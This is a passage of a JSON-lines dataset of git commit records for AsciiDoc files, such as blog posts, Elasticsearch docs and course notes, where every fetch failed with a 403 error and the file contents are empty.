returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"32cbbc2ecfbb28ebd02c5a09f9b21b372d906464","subject":"Revert \"[DOCS] Added 6.3 info & updated the upgrade table. (#30940)\"","message":"Revert \"[DOCS] Added 6.3 info & updated the upgrade table. (#30940)\"\n\nThis reverts commit 40d31d2ae0e5d1004a72de44738948434c8e7a06.\n","repos":"gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/upgrade.asciidoc","new_file":"docs\/reference\/upgrade.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8cb38995fe813bdf0285f091486ad6ae1b556e4","subject":"Create 01-1-Caqdas.adoc","message":"Create 01-1-Caqdas.adoc","repos":"jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/atlasti,jmunoz298\/Atlasti7","old_file":"01-1-Caqdas.adoc","new_file":"01-1-Caqdas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmunoz298\/atlasti.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b8257cb854edd4c5f6dc13fddbb8ffc04481c2d1","subject":"CL: split string","message":"CL: split string\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"69b6f321630373d3304cd6ec4e2f622706527a8d","subject":"Ex init","message":"Ex init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Rest client Ex.adoc","new_file":"Rest client Ex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b8000b89f8a0162df12afadb00088a941f7e27d","subject":"add errors-sentry doc","message":"add errors-sentry 
doc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/errors-sentry.adoc","new_file":"userguide\/tutorials\/errors-sentry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6043e36e500f45f4a23f9fc3ddd097ffcd83ff82","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af4730621f1cfcd0f29f035eebe0d8527ba2d859","subject":"y2b create post Gears of War 3 Throat Communicator Unboxing \\u0026 Overview","message":"y2b create post Gears of War 3 Throat Communicator Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-22-Gears-of-War-3-Throat-Communicator-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-09-22-Gears-of-War-3-Throat-Communicator-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c1d91392887e80161e39f28768bf1dc07b5c793","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1f6e898e20d79e1ecfbb41f6f7ff38dc81a51c3","subject":"Delete the file at '_posts\/2017-10-01-raindrop.adoc'","message":"Delete the file at '_posts\/2017-10-01-raindrop.adoc'","repos":"ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io","old_file":"_posts\/2017-10-01-raindrop.adoc","new_file":"_posts\/2017-10-01-raindrop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ecmeyva\/ecmeyva.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d7820cbb19aec0d978ea24c40c9ab024c6dd9a3","subject":"Update 2015-02-24-Second-Post.adoc","message":"Update 
2015-02-24-Second-Post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Second-Post.adoc","new_file":"_posts\/2015-02-24-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e4010d371c6db3f3d5583c083bdfce046a7a95f","subject":"Update 2016-03-02-Hello-World.adoc","message":"Update 2016-03-02-Hello-World.adoc","repos":"deruelle\/deruelle.github.io,deruelle\/deruelle.github.io,deruelle\/deruelle.github.io,deruelle\/deruelle.github.io","old_file":"_posts\/2016-03-02-Hello-World.adoc","new_file":"_posts\/2016-03-02-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deruelle\/deruelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33d267fea16024c9b708c94029de82b890d2d77a","subject":"Update 2016-04-29-Lorem-Ipsum.adoc","message":"Update 2016-04-29-Lorem-Ipsum.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-04-29-Lorem-Ipsum.adoc","new_file":"_posts\/2016-04-29-Lorem-Ipsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39e08b257ae9615d12c0de7965e64c41f486303c","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d10747c89bb51ef6c7108f51353498eaabc86782","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"509d35a9b193f231251ed6cfb704281a7cd3b688","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1858ea5ff25aebcdc93236fa11a8a25c1bf020fc","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 
2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea5885f9bb8ed587f57001130beb04ce778f460a","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b3c0edf425995927fc9d7de109cd00bb8f76aeb","subject":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","message":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d6e66486050b6cdd3dfaa4488e06b19cf4e043","subject":"Update 2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","message":"Update 2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","new_file":"_posts\/2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ce91141ae6bd797d446dd664c5c0d6c940f41dc","subject":"y2b create post A Charger With Unusual Features...","message":"y2b create post A Charger With Unusual Features...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-12-A-Charger-With-Unusual-Features.adoc","new_file":"_posts\/2016-06-12-A-Charger-With-Unusual-Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c17edfb4d02727e2e910f636d3bbb931bb5cd03","subject":"Update 2016-08-05-Intellij-plugin-to-support-Pony.adoc","message":"Update 
2016-08-05-Intellij-plugin-to-support-Pony.adoc","repos":"everydaynormalgeek\/everydaynormalgeek.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,everydaynormalgeek\/everydaynormalgeek.github.io","old_file":"_posts\/2016-08-05-Intellij-plugin-to-support-Pony.adoc","new_file":"_posts\/2016-08-05-Intellij-plugin-to-support-Pony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/everydaynormalgeek\/everydaynormalgeek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8602062e2f47d8a3eaa4b75ffb13733fe270713","subject":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc'","message":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc","new_file":"_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c81b25786a55314bc6ec94ae78466f339b1273e","subject":"Update 2015-03-02-Le-Temps-et-les-Vetements.adoc","message":"Update 2015-03-02-Le-Temps-et-les-Vetements.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-02-Le-Temps-et-les-Vetements.adoc","new_file":"_posts\/2015-03-02-Le-Temps-et-les-Vetements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10edc9295ac2e2bdcb134d14036f98913a9a0911","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/24\/deref.adoc","new_file":"content\/news\/2021\/11\/24\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d7cb03c5547226994e1bc08213cd7c53f24cb8a9","subject":"y2b create post World's Thinnest LTE Phone!","message":"y2b create post World's Thinnest LTE Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-05-Worlds-Thinnest-LTE-Phone.adoc","new_file":"_posts\/2015-10-05-Worlds-Thinnest-LTE-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"513e8dbd69b9ffdcfa186f8b09044af8af2f6f83","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 
2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9369a4ac9d9f6ac3ff37dd08ef85113eda97fb6","subject":"Update 2017-01-22-Customer-Segments-Project.adoc","message":"Update 2017-01-22-Customer-Segments-Project.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-22-Customer-Segments-Project.adoc","new_file":"_posts\/2017-01-22-Customer-Segments-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a49b41d08a04c85ba3fe9153a5bb788f1c04a4","subject":"y2b create post THE CRAZIEST HEADPHONES EVER","message":"y2b create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-21-THECRAZIESTHEADPHONESEVER.adoc","new_file":"_posts\/2017-12-21-THECRAZIESTHEADPHONESEVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c13fc740e6c324f4437e0a7b5bbca308aaf4dc1","subject":"added README file","message":"added README file\n","repos":"ncollins\/pyquantfi","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncollins\/pyquantfi.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4fe63766f18171b6bbdadbaa3187dd01787c9a27","subject":"Updated changelog","message":"Updated changelog\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7cfa456887fe519290b3409ad1a0dd5c27c82b4","subject":"Update 2016-07-21-2016-07-21.adoc","message":"Update 2016-07-21-2016-07-21.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-21-2016-07-21.adoc","new_file":"_posts\/2016-07-21-2016-07-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dc16c3eae819050715e418fc9811dafca511aad","subject":"Update 2016-07-26-2016-07-26.adoc","message":"Update 
2016-07-26-2016-07-26.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-26-2016-07-26.adoc","new_file":"_posts\/2016-07-26-2016-07-26.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5e854f7821a63e7664c377632e1dac09bf8f19","subject":"Add 1.0.0.Beta02 release blog","message":"Add 1.0.0.Beta02 release blog\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"blog\/2014-12-18-1_0_0_beta02.adoc","new_file":"blog\/2014-12-18-1_0_0_beta02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d0151a44012d1a926cd3f378dc91609319d294b9","subject":"Better cl","message":"Better cl\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"JAX-RS client.adoc","new_file":"JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd7819599d17a106e8f2b2e8a6700e2f3df057bb","subject":"Bullets","message":"Bullets\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab8e6be262119da9a12fef632bafe86483dce8b7","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16057b932ec6b7700a1877164767d1294ef4e4b4","subject":"Added destructuing guide","message":"Added destructuing guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/destructuring.adoc","new_file":"content\/guides\/destructuring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e9dcff674283978a97a0b63415db2cba98f81251","subject":"Update 2016-04-05-My-header.adoc","message":"Update 2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7e5006f4d8536a45a24cf1fc253b3831cfe0e41","subject":"Update 2016-04-05-My-header.adoc","message":"Update 2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07cfe0be871442c680f5fb7741fc2539fae6a73e","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bbaf0689787704622643f2df3d83751fb6c7642","subject":"Update 2017-08-23-githooks.adoc","message":"Update 2017-08-23-githooks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-githooks.adoc","new_file":"_posts\/2017-08-23-githooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29dc94be5c10694be39921d6ee0076fdd347f7cc","subject":"Update 2015-12-02-Open-Medicaments.adoc","message":"Update 2015-12-02-Open-Medicaments.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-12-02-Open-Medicaments.adoc","new_file":"_posts\/2015-12-02-Open-Medicaments.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e2ab372af7470c82822d56dba5517a19805d749","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31789cabeeccd68a48cd0a1fa1a4e78e0340ba8f","subject":"moved the docs folder to the repo","message":"moved the docs folder to the repo\n","repos":"elastic\/elasticsearch-perl,elastic\/elasticsearch-perl","old_file":"docs\/index.asciidoc","new_file":"docs\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elastic\/elasticsearch-perl.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30172458dde73b9b448679c705c84fcec2e7aa60","subject":"Add the CDK preparation instructions","message":"Add the CDK preparation instructions\n","repos":"redhat-reactive-msa\/redhat-reactive-msa","old_file":"cdk-prepare.adoc","new_file":"cdk-prepare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-reactive-msa\/redhat-reactive-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51e9465cc31ed65f46f3df6fa50b96b18507b486","subject":"Update 2015-10-05-draft.adoc","message":"Update 2015-10-05-draft.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-draft.adoc","new_file":"_posts\/2015-10-05-draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb64294aad7186445fad96712f92f584a3cae39e","subject":"Update 2018-10-09-D3js1.adoc","message":"Update 2018-10-09-D3js1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-09-D3js1.adoc","new_file":"_posts\/2018-10-09-D3js1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59f3da1abb4efddfa8160aedff93ddb8d187af25","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 